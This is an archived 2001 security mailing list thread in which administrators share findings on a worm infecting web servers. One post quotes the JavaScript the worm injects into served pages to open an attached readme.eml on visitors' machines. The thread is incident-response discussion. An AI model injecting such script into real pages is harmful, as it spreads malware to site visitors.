Security Incidents mailing list archives
RE: Some more details on the worm
From: "Steiner, Michael" <michael.steiner () akamai com>
Date: Tue, 18 Sep 2001 11:47:36 -0700
I have went to several infected web sites to test this exploit and I am prompted if I would like to execute. I am running ie 5.50.4522.1800 with 128bit encryption, service pack 1, q254518, q279328 and q299618 applied Michael Steiner Senior NT Administrator Akamai Technologies, Inc. Desk: 858-909-3319 Cell: 858-967-4394 Pager: 877-981-6158 E Mail Address: Michael.Steiner () akamai com Pager E Mail: 8779816158 () skytel com -----Original Message----- From: Davis, Matt [mailto:matt.davis () countryfinancial com] Sent: Tuesday, September 18, 2001 9:44 AM To: Davis, Matt Cc: NTBUGTRAQ () LISTSERV NTBUGTRAQ COM; incidents () securityfocus com; unisog () sans org Subject: Some more details on the worm When pages are served up by an infected server, it looks as though readme.eml is 'attached' to them. The server attempts to get the client to open them through the following bit of code (from the .dll file): <script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script> According to Slashdot, this causes the file to be automatically opened and executed by the client. I haven't been able to confirm or deny that (but if someone can, please do). Regards, Matt -- Matt Davis, MCP Intermediate Client Server Business Support Analyst COUNTRY(SM) Insurance & Financial Services 309-821-6288 mailto:matt.davis () countryfinancial com ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- Some more details on the worm Davis, Matt (Sep 18)
- Re: [unisog] Some more details on the worm Gary Flynn (Sep 18)
- <Possible follow-ups>
- RE: Some more details on the worm Steiner, Michael (Sep 18)